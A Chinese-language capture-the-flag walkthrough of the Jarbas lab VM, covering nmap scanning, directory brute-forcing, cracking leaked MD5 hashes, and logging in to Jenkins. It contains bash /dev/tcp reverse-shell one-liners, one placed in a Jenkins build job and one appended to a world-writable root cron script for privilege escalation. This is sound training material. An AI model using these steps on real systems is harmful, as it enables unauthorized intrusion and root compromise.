JARBAS

主机发现

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:36 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00019s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00022s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.130
Host is up (0.00052s latency).
MAC Address: 00:0C:29:9B:D1:28 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:E5:45:76 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.95 seconds

端口扫描

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.130 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:37 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00076s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:9B:D1:28 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.25 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,80,3306,8080 10.10.10.130 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:39 EDT
Nmap scan report for 10.10.10.130
Host is up (0.00042s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA)
|   256 a0:1b:90:2c:da:79:eb:8f:3b:14:de:bb:3f:d2:e7:3f (ECDSA)
|_  256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Jarbas - O Seu Mordomo Virtual!
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 00:0C:29:9B:D1:28 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.73 seconds

UDP

└─$ sudo nmap -sU --top-ports 20 10.10.10.130 nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:40 EDT
Unable to split netmask from target expression: "nmapscan/udp"
Nmap scan report for 10.10.10.130
Host is up (0.00042s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:9B:D1:28 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.50 seconds

Nmap漏洞扫描

└─$ sudo nmap --script=vuln -p22,80,3306,8080 10.10.10.130 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-17 02:42 EDT
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.130
Host is up (0.00032s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-trace: TRACE is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:9B:D1:28 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 62.15 seconds

渗透思路

尝试空密码登录MySQL

└─$ mysql -h 10.10.10.130 -u root -p
Enter password:
ERROR 1130 (HY000): Host '10.10.10.128' is not allowed to connect to this MariaDB server

Web渗透

访问80与8080端口与robots.txt文件

└─$ curl http://10.10.10.130:8080/robots.txt
# we don't want robots to click "build" links
User-agent: *
Disallow: /

• 80为前台页面，
• 8080为后台登录页面
• 得到一个build路径

尝试目录爆破

└─$ sudo gobuster dir -u http://10.10.10.130 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/17 02:56:42 Starting gobuster in directory enumeration mode
===============================================================
Progress: 21985 / 62285 (35.30%)[ERROR] 2023/07/17 02:56:46 [!] parse "http://10.10.10.130/error\x1f_log": net/url: invalid control character in URL
Progress: 60496 / 62285 (97.13%)
===============================================================
2023/07/17 02:56:52 Finished
===============================================================

未爆破出目录，指定扩展名重新爆破

└─$ sudo gobuster dir -u http://10.10.10.130 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x php,html
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.130
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,html
[+] Timeout:                 10s
===============================================================
2023/07/17 02:59:17 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]
Progress: 67581 / 186855 (36.17%)[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/besalu\t.php": net/url: invalid control character in URL
Progress: 70823 / 186855 (37.90%)[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/error\x1f_log.php": net/url: invalid control character in URL
[ERROR] 2023/07/17 02:59:28 [!] parse "http://10.10.10.130/error\x1f_log.html": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 207]
/index.html           (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
Progress: 186306 / 186855 (99.71%)
===============================================================
2023/07/17 02:59:46 Finished
===============================================================

访问access.html路径

得到三组字符

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98

尝试识别

└─$ hash-identifier '5978a63b4654c73c60fa24f836386d87'
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

尝试破解

tiago:5978a63b4654c73c60fa24f836386d87->italia99
trindade:f463f63616cb3f1e81ce46b39f882fd5->marianna
eder:9b38e2b1e8b12f426b0d208a7ab6cb98->vipsu

根据获得的账号密码尝试登录后台

• eder:vipsu账号密码成功登录后台

创建一个新任务用于反弹shell

/bin/bash -i >& /dev/tcp/10.10.10.128/4321 0>&1

攻击机开启监听端口，后台点击立即构建获得反弹shell

主机信息搜集

bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ifconfig
ifconfig
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified

bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied
bash-4.2$

• 无sudo权限
• root、eder账户可登录
• shadow文件无权限

查看定时计划列表

bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$

bash-4.2$ ls -l /etc/script/CleaningScript.sh
ls -l /etc/script/CleaningScript.sh
-rwxrwxrwx. 1 root root 50 Apr  1  2018 /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
bash-4.2$

• 该定时任务以root权限运行，并且拥有读写权限

定时计划反弹shell并提权

追加反弹shell指令到计划任务，并开启监听

bash-4.2$ echo "/bin/bash -i >& /dev/tcp/10.10.10.128/1234 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/10.10.10.128/1234 0>&1" >> /etc/script/CleaningScript.sh
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
/bin/bash -i >& /dev/tcp/10.10.10.128/1234 0>&1
bash-4.2$

成功获得root权限shell

└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.130] 44504
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs
[root@jarbas ~]#